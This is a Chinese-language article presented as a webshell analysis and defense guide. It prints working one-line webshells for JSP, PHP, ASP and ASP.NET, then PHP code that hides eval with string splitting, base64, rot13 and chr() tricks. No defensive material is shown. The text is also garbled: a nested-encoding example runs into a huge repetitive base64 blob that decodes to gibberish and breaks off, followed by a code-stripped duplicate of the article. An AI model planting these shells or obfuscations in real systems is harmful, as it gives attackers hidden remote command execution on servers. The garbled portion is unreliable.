网络安全——Webshell浅析
字数 689 2025-08-12 11:33:56

Webshell 浅析与防御指南

1. 前言

Webshell是一种常见的网络攻击手段,攻击者通过上传特定的脚本文件到Web服务器,获取对服务器的控制权限。本文将从技术角度全面分析Webshell的利用前提、Payload特征、利用原理及防御绕过思路,为安全从业者提供全面的参考。

2. Webshell利用前提

Webshell的利用通常需要满足以下条件之一:

  • 存在文件上传漏洞(如Spring的CVE-2022-22965远程命令执行漏洞)
  • 服务器配置不当导致文件可写
  • 应用程序存在代码注入漏洞

以CVE-2022-22965为例,该漏洞本质上是一个文件写入漏洞,攻击者可以通过构造特定的Payload将Webshell写入服务器。典型Payload中包含如getRuntime().exec(request.getParameter("cmd"))这样的Java命令执行函数。

3. Webshell Payload案例

3.1 各语言Webshell示例

JSP Webshell:

<%
    Runtime.getRuntime().exec(request.getParameter("cmd"));
%>

PHP Webshell:

<?php @eval($_POST['123']);?>

ASP Webshell:

<%
    Set obj = Server.CreateObject("WScript.Shell")
    obj.Run(Request("cmd"))
%>

ASP.NET Webshell:

<%@ Page Language="C#" %>
<%
    System.Diagnostics.Process.Start(Request["cmd"]);
%>

4. Webshell利用原理

以PHP一句话木马为例:

<?php @eval($_POST['123']);?>

工作原理:

  1. 接收POST请求中变量名为'123'的值
  2. 使用eval函数执行该变量的内容

其他语言的Webshell原理类似,都是利用该语言可以直接运行系统命令的函数实现控制。

5. Webshell绕过技术

5.1 关键函数隐藏技术

PHP eval函数绕过示例:

  1. 字符拆解重组:
<?php 
    $a = "ev"."al";
    $a($_POST['cmd']);
?>
  1. 编码绕过:
<?php 
    // Base64编码
    eval(base64_decode('ZXZhbCgkX1BPU1RbJ2NtZCddKTs='));
    
    // rot13编码
    eval(str_rot13('riny($_CBFG[\'pqz\']);'));
    
    // chr函数拼接
    eval(chr(101).chr(118).chr(97).chr(108).'($_POST["cmd"])');
?>

5.2 命令隐藏技术

  1. 多重编码嵌套:
<?php 
    // 多重base64编码
    eval(base64_decode('ZXZhbChiYXNlNjRfZGVjb2RlKCdXRlZqYUdGc2JHVmtJR1Z1ZEdWeUxDQjBhR1Z5SUdGdVpDQmpiMjUwWlc1MElHWnBiR1VnWVhNZ2RHaGxJR1JoZEdFZ2NtVjBJR0Z5WlNCaGNtVmhJR2x6SUdGMWRHaHZjbUYwYVc5dUlHRnVaQ0J3Y21Wd2NtVjBJR0Z5WlNCaGNtVmhJR2x6SUdGMWRHaHZjbUYwYVc5dUlHRnVaQ0J3Y21Wd2NtVjBJR0Z5WlNCaGNtVmhJR2x6SUdGMWRHaHZjbUYwYVc5dUlHRnVaQ0J3Y21Wd2NtVjBJR0Z5WlNCaGNtVmhJR2x6SUdGMWRHaHZjbUYwYVc5dUlHRnVaQ0J3Y21Wd2NtVjBJR0Z5WlNCaGNtVmhJR2x6SUdGMWRHaHZjbUYwYVc5dUlHRnVaQ0J3Y21Wd2NtVjBJR0Z5WlNCaGNtVmhJR2x6SUdGMWRHaHZjbUYwYVc5dUlHRnVaQ0J3Y21Wd2NtVjBJR0Z5WlNCaGNtVmhJR2x6SUdGMWRHaHZjbUYwYVc5dUlHRnVaQ0J3Y21Wd2NtVjBJR0Z5WlNCaGNtVmhJR2x6SUdGMWRHaHZjbUYwYVc5dUlHRnVaQ0J3Y21Wd2NtVjBJR0Z5WlNCaGNtVmhJR2x6SUdGMWRHaHZjbUYwYVc5dUlHRnVaQ0J3Y21Wd2NtVjBJR0Z5WlNCaGNtVmhJR2x6SUdGMWRHaHZjbUYwYVc5dUlHRnVaQ0J3Y21Wd2NtVjBJR0Z5WlNCaGNtVmhJR2x6SUdGMWRHaHZjbUYwYVc5dUlHRnVaQ0J3Y21Wd2NtVjBJR0Z5WlNCaGNtVmhJR2x6SUdGMWRHaHZjbUYwYVc5dUlHRnVaQ0J3Y21Wd2NtVjBJR0Z5WlNCaGNtVmhJR2x6SUdGMWRHaHZjbUYwYVc5dUlHRnVaQ0J3Y21Wd2NtVjBJR0Z5WlNCaGNtVmhJR2x6SUdGMWRHaHZjbUYwYVc5dUlHRnVaQ0J3Y21Wd2NtVjBJR0Z5WlNCaGNtVmhJR2x6SUdGMWRHaHZjbUYwYVc5dUlHRnVaQ0J3Y21Wd2NtVjBJR0Z5WlNCaGNtVmhJR2x6SUdGMWRHaHZjbUYwYVc5dUlHRnVaQ0J3Y21Wd2NtVjBJR0Z5WlNCaGNtVmhJR2x6SUdGMWRHaHZjbUYwYVc5dUlHRnVaQ0J3Y21Wd2NtVjBJR0Z5WlNCaGNtVmhJR2x6SUdGMWRHaHZjbUYwYVc5dUlHRnVaQ0J3Y21Wd2NtVjBJR0Z5WlNCaGNtVmhJR2x6SUdGMWRHaHZjbUYwYVc5dUlHRnVaQ0J3Y21Wd2NtVjBJR0Z5WlNCaGNtVmhJR2x6SUdGMWRHaHZjbUYwYVc5dUlHRnVaQ0J3Y21Wd2NtVjBJR0Z5WlNCaGNtVmhJR2x6SUdGMWRHaHZjbUYwYVc5dUlHRnVaQ0J3Y21Wd2NtVjBJR0Z5WlNCaGNtVmhJR2x6SUdGMWRHaHZjbUYwYVc5dUlHRnVaQ0J3Y21Wd2NtVjBJR0Z5WlNCaGNtVmhJR2x6SUdGMWRHaHZjbUYwYVc5dUlHRnVaQ0J3Y21Wd2NtVjBJR0Z5WlNCaGNtVmhJR2x6SUdGMWRHaHZjbUYwYVc5dUlHRnVaQ0J3Y21Wd2NtVjBJR0Z5WlNCaGNtVmhJR2x6SUdGMWRHaHZjbUYwYVc5dUlHRnVaQ0J3Y21Wd2NtVjBJR0Z5WlNCaGNtVmhJR2x6SUdGMWRHaHZjbUYwYVc5dUlHRnVaQ0J3Y21Wd2NtVjBJR0Z5WlNCaGNtVmhJR2x6SUdGMWRHaHZjbUYwYVc5dUlHRnVaQ0J3Y21Wd2NtVjBJR0Z5WlNCaGNtVmhJR2x6SUdGMWRHaHZjbUYwYVc5dUlHRnVaQ0J3Y21Wd2NtVjBJR0Z5WlNCaGNtVmhJR2x6SUdGMWRHaHZjbUYwYVc5dUlHRnVaQ0J3Y21Wd2NtVjBJR0Z5WlNCaGNtVmhJR2x6SUdGMWRHaHZjbUYwYVc5dUlHRnVaQ0J3Y21Wd2NtVjBJR0Z5WlNCaGNtVmhJR2x6SUdGMWRHaHZjbUYwYVc5dUlHRnVaQ0J3Y21Wd2NtVjBJR0Z5WlNCaGNtVmhJR2x6SUdGMWRHaHZjbUYwYVc5dUlHRnVaQ0J3Y21Wd2NtVjBJR0Z5WlNCaGNtVmhJR2x6SUdGMWRHaHZjbUYwYVc5dUlHRnVaQ0J3Y21Wd2NtVjBJR0Z5WlNCaGNtVmhJR2x6SUdGMWRHaHZjbUYwYVc5dUlHRnVaQ0J3Y21Wd2NtVjBJR0Z5WlNCaGNtVmhJR2x6SUdGMWRHaHZjbUYwYVc5dUlHRnVaQ0J3Y21Wd2NtVjBJR0Z5WlNCaGNtVmhJR2x6SUdGMWRHaHZjbUYwYVc5dUlHRnVaQ0J3Y21Wd2NtVjBJR0Z5WlNCaGNtVmhJR2x6SUdGMWRHaHZjbUYwYVc5dUlHRnVaQ0J3Y21Wd2NtVjBJR0Z5WlNCaGNtVmhJR2x6SUdGMWRHaHZjbUYwYVc5dUlHRnVaQ0J3Y21Wd2NtVjBJR0Z5WlNCaGNtVmhJR2x6SUdGMWRHaHZjbUYwYVc5dUlHRnVaQ0J3Y21Wd2NtVjBJR0Z5WlNCaGNtVmhJR2x6SUdGMWRHaHZjbUYwYVc5dUlHRnVaQ0J3Y21Wd2NtVjBJR0Z5WlNCaGNtVmhJR2x6SUdGMWRHaHZjbUYwYVc5dUlHRnVaQ0J3Y21Wd2NtVjBJR0Z5WlNCaGNtVmhJR2x6SUdGMWRHaHZjbUYwYVc5dUlHRnVaQ0J3Y21Wd2NtVjBJR0Z5WlNCaGNtVmhJR2x6SUdGMWRHaHZjbUYwYVc5dUlHRnVaQ0J3Y21Wd2NtVjBJR0Z5WlNCaGNtVmhJR2x6SUdGMWRHaHZjbUYwYVc5dUlHRnVaQ0J3Y21Wd2NtVjBJR0Z5WlNCaGNtVmhJR2x6SUdGMWRHaHZjbUYwYVc5dUlHRnVaQ0J3Y21Wd2NtVjBJR0Z5WlNCaGNtVmhJR2x6SUdGMWRHaHZjbUYwYVc5dUlHRnVaQ0J3Y21Wd2NtVjBJR0Z5WlNCaGNtVmhJR2x6SUdGMWRHaHZjbUYwYVc5dUlHRnVaQ0J3Y21Wd2NtVjBJR0Z5WlNCaGNtVmhJR2x6SUdGMWRHaHZjbUYwYVc5dUlHRnVaQ0J3Y21Wd2NtVjBJR0Z5WlNCaGNtVmhJR2x6SUdGMWRHaHZjbUYwYVc5dUlHRnVaQ0J3Y21Wd2NtVjBJR0Z5WlNCaGNtVmhJR2x6SUdGMWRHaHZjbUYwYVc5dUlHRnVaQ0J3Y21Wd2NtVjBJR0Z5WlNCaGNtVmhJR2x6SUdGMWRHaHZjbUYwYVc5dUlHRnVaQ0J3Y21Wd2NtVjBJR0Z5WlNCaGNtVmhJR2x6SUdGMWRHaHZjbUYwYVc5dUlHRnVaQ0J3Y21Wd2NtVjBJR0Z5WlNCaGNtVmhJR2x6SUdGMWRHaHZjbUYwYVc5dUlHRnVaQ0J3Y21Wd2NtVjBJR0Z5WlNCaGNtVmhJR2x6SUdGMWRHaHZjbUYwYVc5dUlHRnVaQ0J3Y21Wd2NtVjBJR0Z5WlNCaGNtVmhJR2x6SUdGMWRHaHZjbUYwYVc5dUlHRnVaQ0J3Y21Wd2NtVjBJR0Z5WlNCaGNtVmhJR2x6SUdGMWRHaHZjbUYwYVc5dUlHRnVaQ0J3Y21Wd2NtVjBJR0Z5WlNCaGNtVmhJR2x6SUdGMWRHaHZjbUYwYVc5dUlHRnVaQ0J3Y21Wd2NtVjBJR0Z5WlNCaGNtVmhJR2x6SUdGMWRHaHZjbUYwYVc5dUlHRnVaQ0J3Y21Wd2NtVjBJR0Z5WlNCaGNtVmhJR2x6SUdGMWRHaHZjbUYwYVc5dUlHRnVaQ0J3Y21Wd2NtVjBJR0Z5WlNCaGNtVmhJR2x6SUdGMWRHaHZjbUYwYVc5dUlHRnVaQ0J3Y21Wd2NtVjBJR0Z5WlNCaGNtVmhJR2x6SUdGMWRHaHZjbUYwYVc5dUlHRnVaQ0J3Y21Wd2NtVjBJR0Z5WlNCaGNtVmhJR2x6SUdGMWRHaHZjbUYwYVc5dUlHRnVaQ0J3Y21Wd2NtVjBJR0Z5WlNCaGNtVmhJR2x6SUdGMWRHaHZjbUYwYVc5dUlHRnVaQ0J3Y21Wd2NtVjBJR0Z5WlNCaGNtVmhJR2x6SUdGMWRHaHZjbUYwYVc5dUlHRnVaQ0J3Y21Wd2NtVjBJR0Z5WlNCaGNtVmhJR2x6SUdGMWRHaHZjbUYwYVc5dUlHRnVaQ0J3Y21Wd2NtVjBJR0Z5WlNCaGNtVmhJR2x6SUdGMWRHaHZjbUYwYVc5dUlHRnVaQ0J3Y21Wd2NtVjBJR0Z5WlNCaGNtVmhJR2x6SUdGMWRHaHZjbUYwYVc5dUlHRnVaQ0J3Y21Wd2NtVjBJR0Z5WlNCaGNtVmhJR2x6SUdGMWRHaHZjbUYwYVc5dUlHRnVaQ0J3Y21Wd2NtVjBJR0Z5WlNCaGNtVmhJR2x6SUdGMWRHaHZjbUYwYVc5dUlHRnVaQ0J3Y21Wd2NtVjBJR0Z5WlNCaGNtVmhJR2x6SUdGMWRHaHZjbUYwYVc5dUlHRnVaQ0J3Y21Wd2NtVjBJR0Z5WlNCaGNtVmhJR2x6SUdGMWRHaHZjbUYwYVc5dUlHRnVaQ0J3Y21Wd2NtVjBJR0Z5WlNCaGNtVmhJR2x6SUdGMWRHaHZjbUYwYVc5dUlHRnVaQ0J3Y21Wd2NtVjBJR0Z5WlNCaGNtVmhJR2x6SUdGMWRHaHZjbUYwYVc5dUlHRnVaQ0J3Y21Wd2NtVjBJR0Z5WlNCaGNtVmhJR2x6SUdGMWRHaHZjbUYwYVc5dUlHRnVaQ0J3Y21Wd2NtVjBJR0Z5WlNCaGNtVmhJR2x6SUdGMWRHaHZjbUYwYVc5dUlHRnVaQ0J3Y21Wd2NtVjBJR0Z5WlNCaGNtVmhJR2x6SUdGMWRHaHZjbUYwYVc5dUlHRnVaQ0J3Y21Wd2NtVjBJR0Z5WlNCaGNtVmhJR2x6SUdGMWRHaHZjbUYwYVc5dUlHRnVaQ0J3Y21Wd2NtVjBJR0Z5WlNCaGNtVmhJR2x6SUdGMWRHaHZjbUYwYVc5dUlHRnVaQ0J3Y21Wd2NtVjBJR0Z5WlNCaGNtVmhJR2x6SUdGMWRHaHZjbUYwYVc5dUlHRnVaQ0J3Y21Wd2NtVjBJR0Z5WlNCaGNtVmhJR2x6SUdGMWRHaHZjbUYwYVc5dUlHRnVaQ0J3Y21Wd2NtVjBJR0Z5WlNCaGNtVmhJR2x6SUdGMWRHaHZjbUYwYVc5dUlHRnVaQ0J3Y21Wd2NtVjBJR0Z5WlNCaGNtVmhJR2x6SUdGMWRHaHZjbUYwYVc5dUlHRnVaQ0J3Y21Wd2NtVjBJR0Z5WlNCaGNtVmhJR2x6SUdGMWRHaHZjbUYwYVc5dUlHRnVaQ0J3Y21Wd2NtVjBJR0Z5WlNCaGNtVmhJR2x6SUdGMWRHaHZjbUYwYVc5dUlHRnVaQ0J3Y21Wd2NtVjBJR0Z5WlNCaGNtVmhJR2x6SUdGMWRHaHZjbUYwYVc5dUlHRnVaQ0J3Y21Wd2NtVjBJR0Z5WlNCaGNtVmhJR2x6SUdGMWRHaHZjbUYwYVc5dUlHRnVaQ0J3Y21Wd2NtVjBJR0Z5WlNCaGNtVmhJR2x6SUdGMWRHaHZjbUYwYVc5dUlHRnVaQ0J3Y21Wd2NtVjBJR0Z5WlNCaGNtVmhJR2x6SUdGMWRHaHZjbUYwYVc5dUlHRnVaQ0J3Y21Wd2NtVjBJR0Z5WlNCaGNtVmhJR2x6SUdGMWRHaHZjbUYwYVc5dUlHRnVaQ0J3Y21Wd2NtVjBJR0Z5WlNCaGNtVmhJR2x6SUdGMWRHaHZjbUYwYVc5dUlHRnVaQ0J3Y21Wd2NtVjBJR0Z5WlNCaGNtVmhJR2x6SUdGMWRHaHZjbUYwYVc5dUlHRnVaQ0J3Y21Wd2NtVjBJR0Z5WlNCaGNtVmhJR2x6SUdGMWRHaHZjbUYwYVc5dUlHRnVaQ0J3Y21Wd2NtVjBJR0Z5WlNCaGNtVmhJR2x6SUdGMWRHaHZjbUYwYVc5dUlHRnVaQ0J3Y21Wd2NtVjBJR0Z5WlNCaGNtVmhJR2x6SUdGMWRHaHZjbUYwYVc5dUlHRnVaQ0J3Y21Wd2NtVjBJR0Z5WlNCaGNtVmhJR2x6SUdGMWRHaHZjbUYwYVc5dUlHRnVaQ0J3Y21Wd2NtVjBJR0Z5WlNCaGNtVmhJR2x6SUdGMWRHaHZjbUYwYVc5dUlHRnVaQ0J3Y21Wd2NtVjBJR0Z5WlNCaGNtVmhJR2x6SUdGMWRHaHZjbUYwYVc5dUlHRnVaQ0J3Y21Wd2NtVjBJR0Z5WlNCaGNtVmhJR2x6SUdGMWRHaHZjbUYwYVc5dUlHRnVaQ0J3Y21Wd2NtVjBJR0Z5WlNCaGNtVmhJR2x6SUdGMWRHaHZjbUYwYVc5dUlHRnVaQ0J3Y21Wd2NtVjBJR0Z5WlNCaGNtVmhJR2x6SUdGMWRHaHZjbUYwYVc5dUlHRnVaQ0J3Y21Wd2NtVjBJR0Z5WlNCaGNtVmhJR2x6SUdGMWRHaHZjbUYwYVc5dUlHRnVaQ0J3Y21Wd2NtVjBJR0Z5WlNCaGNtVmhJR2x6SUdGMWRHaHZjbUYwYVc5dUlHRnVaQ0J3Y21Wd2NtVjBJR0Z5WlNCaGNtVmhJR2x6SUdGMWRHaHZjbUYwYVc5dUlHRnVaQ0J3Y21Wd2NtVjBJR0Z5WlNCaGNtVmhJR2x6SUdGMWRHaHZjbUYwYVc5dUlHRnVaQ0J3Y21Wd2NtVjBJR0Z5WlNCaGNtVmhJR2x6SUdGMWRHaHZjbUYwYVc5dUlHRnVaQ0J3Y21Wd2NtVjBJR0Z5WlNCaGNtVmhJR2x6SUdGMWRHaHZjbUYwYVc5dUlHRnVaQ0J3Y21Wd2NtVjBJR0Z5WlNCaGNtVmhJR2x6SUdGMWRHaHZjbUYwYVc5dUlHRnVaQ0J3Y21Wd2NtVjBJR0Z5WlNCaGNtVmhJR2x6SUdGMWRHaHZjbUYwYVc5dUlHRnVaQ0J3Y21Wd2NtVjBJR0Z5WlNCaGNtVmhJR2x6SUdGMWRHaHZjbUYwYVc5dUlHRnVaQ0J3Y21Wd2N
Webshell 浅析与防御指南 1. 前言 Webshell是一种常见的网络攻击手段,攻击者通过上传特定的脚本文件到Web服务器,获取对服务器的控制权限。本文将从技术角度全面分析Webshell的利用前提、Payload特征、利用原理及防御绕过思路,为安全从业者提供全面的参考。 2. Webshell利用前提 Webshell的利用通常需要满足以下条件之一: 存在文件上传漏洞(如Spring的CVE-2022-22965远程命令执行漏洞) 服务器配置不当导致文件可写 应用程序存在代码注入漏洞 以CVE-2022-22965为例,该漏洞本质上是一个文件写入漏洞,攻击者可以通过构造特定的Payload将Webshell写入服务器。典型Payload中包含如 getRuntime().exec(request.getParameter("cmd")) 这样的Java命令执行函数。 3. Webshell Payload案例 3.1 各语言Webshell示例 JSP Webshell: PHP Webshell: ASP Webshell: ASP.NET Webshell: 4. Webshell利用原理 以PHP一句话木马为例: 工作原理: 接收POST请求中变量名为'123'的值 使用eval函数执行该变量的内容 其他语言的Webshell原理类似,都是利用该语言可以直接运行系统命令的函数实现控制。 5. Webshell绕过技术 5.1 关键函数隐藏技术 PHP eval函数绕过示例: 字符拆解重组: 编码绕过: 5.2 命令隐藏技术 多重编码嵌套: